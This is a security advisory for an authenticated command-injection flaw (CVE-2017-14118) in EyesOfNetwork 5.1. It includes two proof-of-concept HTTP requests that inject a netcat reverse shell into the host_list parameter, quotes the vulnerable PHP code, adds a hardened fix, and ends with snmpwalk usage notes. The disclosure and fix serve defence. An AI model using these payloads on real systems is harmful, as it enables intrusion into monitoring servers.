[CVE-2017-14118] EyesOfNetwork (EON) 5.1 - Remote Code Execution

Description

EyesOfNetwork ("EON") is an OpenSource network monitoring solution.

Remote Code Execution (authenticated)

The Eonweb code does not correctly filter request arguments before passing them to shell commands, allowing
authenticated users to execute arbitrary code on the monitoring server.

Proof of Concept 1

On the attacker's host, we start a handler:

nc -lvp 2333

The host_list parameter is not correctly filtered before it is used by
the exec() function.

It is therefore possible to inject a payload as in the request below,
where the target connects back to our handler:

POST /module/tool_all/select_tool.php HTTP/1.1
Host: 192.168.8.10
Connection: close
Content-Length: 284
Accept: */*
Origin: https://192.168.8.10
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: https://192.168.8.10/module/tool_all/
Accept-Language: zh-CN,zh;q=0.8
Cookie: session_id=1378474655; user_name=admin; user_id=1; user_limitation=0; group_id=1

page=bylistbox&host_list=localhost.1.3.6.1.2.1.25.2.2||nc -e /bin/bash 192.168.8.1 2333||&tool_list=tools%2Finterface.php&snmp_com=EyesOfNetwork&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=


Vulnerable code

In the module\tool_all\tools\interface.php file, at line 50,
we can see that our payload is injected into the exec() function without any sanitization:

.......
        $command="-a $snmp_auth_protocol -u $username -A $password $snmp_priv_protocol $snmp_priv_passphrase $snmp_context";
    }
}
else{
    message(4,"Could not get SNMP Community","critical");
    die;
}
// Get host detail with snmp command
exec("snmpwalk -Oqv -c $snmp_community -v $snmp_version $command $host_name sysUpTime",$result_sysuptime);
exec("snmpwalk -Oqv -c $snmp_community -v $snmp_version $command $host_name sysName",$result_sysname);
........

Proof of Concept 2

On the attacker's host, we start a handler:

nc -lvp 2333

It is therefore possible to inject a payload as in the request below,
where the target connects back to our handler:

POST /module/tool_all/select_tool.php HTTP/1.1
Host: 192.168.8.10
Connection: close
Content-Length: 280
Accept: */*
Origin: https://192.168.8.10
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: https://192.168.8.10/module/tool_all/
Accept-Language: zh-CN,zh;q=0.8
Cookie: session_id=1378474655; user_name=admin; user_id=1; user_limitation=0; group_id=1

page=bylistbox&host_list=localhost.1.3.6.1.2.1.4.20||nc -e /bin/bash 192.168.8.1 2333&tool_list=tools%2Fsnmpwalk.php&snmp_com=EyesOfNetwork+&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=


Vulnerable code

In the module\tool_all\tools\snmpwalk.php file, at line 67,
we can see that our payload is injected into the popen() function without any sanitization:

......
    $command = "snmpwalk -c $snmp_community -v $snmp_version -a $snmp_auth_protocol -u $username -A $password $snmp_priv_protocol $snmp_priv_passphrase $snmp_context $host_name";
}
else{
    $command = "snmpwalk -c $snmp_community -v $snmp_version $host_name";
}
......
echo "<p class='text-info fa fa-info-circle'> ".getLabel("label.exec_command")." : <b>".$command."</b></p><br>";
// $command still contains the raw request values; popen() hands it to /bin/sh
$handle = popen($command,'r');
echo "<p>";
while($read = fread($handle,100)){
    echo nl2br($read);
    flush();
}
pclose($handle);
......
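A hardened way to build the same snmpwalk command that interface.php (exec()) and snmpwalk.php (popen()) assemble from request parameters, as an added example that is not part of the advisory or of EyesOfNetwork's code; it assumes host_list has already been split into host and OID (the split shown is constructed) and omits the SNMPv3 options:

```php
<?php
// Added example (not EyesOfNetwork code): hardened construction of the snmpwalk
// command from the request parameters that interface.php and snmpwalk.php
// interpolate straight into the exec()/popen() command string.

// Reject anything that is not plausibly a host, an OID or a supported version.
function validate_snmp_params(array $p): array
{
    // Host: hostname or IP literal characters only, never shell metacharacters.
    if (!preg_match('/^[A-Za-z0-9.\-:]{1,253}$/', $p['host_name'] ?? '')) {
        throw new InvalidArgumentException('invalid host_name');
    }
    // OID: dotted numeric OID or a MIB symbol such as sysUpTime or hrMemorySize.
    if (!preg_match('/^[A-Za-z0-9.\-]{1,128}$/', $p['oid'] ?? '')) {
        throw new InvalidArgumentException('invalid oid');
    }
    if (!in_array($p['snmp_version'] ?? '', ['1', '2c', '3'], true)) {
        throw new InvalidArgumentException('invalid snmp_version');
    }
    return $p;
}

function build_snmpwalk_command(array $p): string
{
    $p = validate_snmp_params($p);
    // escapeshellarg() single-quotes each value, so even a value that passed the
    // allowlist is handed to snmpwalk as one argument and cannot start a new command.
    return 'snmpwalk -Oqv -c ' . escapeshellarg($p['snmp_community'] ?? 'public')
        . ' -v ' . escapeshellarg($p['snmp_version'])
        . ' ' . escapeshellarg($p['host_name'])
        . ' ' . escapeshellarg($p['oid']);
}

// Assumed split of the advisory's host_list value into host and OID (constructed input).
$legit = ['host_name' => 'localhost', 'oid' => '1.3.6.1.2.1.25.2.2',
          'snmp_version' => '2c', 'snmp_community' => 'EyesOfNetwork'];
$hostile = $legit;
$hostile['oid'] = '1.3.6.1.2.1.25.2.2||nc -e /bin/bash 192.168.8.1 2333||';

echo build_snmpwalk_command($legit), PHP_EOL;
try {
    build_snmpwalk_command($hostile);   // the injected "||nc ..." tail never reaches the shell
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Note that escaping alone is not a substitute for the allowlist: a single-quoted host that snmpwalk cannot resolve still fails safely, but the regex is what keeps log and error output readable and blocks the injection before any shell is involved.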

[Discoverer]
hi-building

Use CVE-2017-14118.

[Discoverer]
hi-building

Use CVE-2017-14119.

The snmpwalk command is the most effective way to probe a system for all kinds of information; the common usages are as follows:

1. snmpwalk -c public -v 1 -m ALL 10.0.1.52 .1.3.6.1.2.1.25.1
   Gets the Windows host's system processes, number of users, etc.

2. snmpwalk -c public -v 1 -m ALL 10.0.1.52 .1.3.6.1.2.1.25.2.2
   Gets the total system memory

3. snmpwalk -c public -v 1 -m ALL 10.0.1.52 hrSystemNumUsers
   Gets the number of system users

4. snmpwalk -c public -v 1 -m ALL 10.0.1.52 .1.3.6.1.2.1.4.20
   Gets IP address information

5. snmpwalk -v 2c -c public 10.0.1.52 system
   Shows system information

6. snmpwalk -v 1 10.0.1.52 -c public ifDescr
   Gets network interface information

The same query as item 1 using SNMP version 2c:

snmpwalk -v 2c -c public 10.0.1.52 .1.3.6.1.2.1.25.1
Gets the Windows host's system processes, number of users, etc.

Here -v specifies the SNMP version and -c the community string (the password).

snmpwalk can retrieve all kinds of system information; just change the OID or MIB name at the end. If you do not know which type you want, it can be omitted, in which case all system information is retrieved:

snmpwalk -v 2c -c public 10.0.1.52
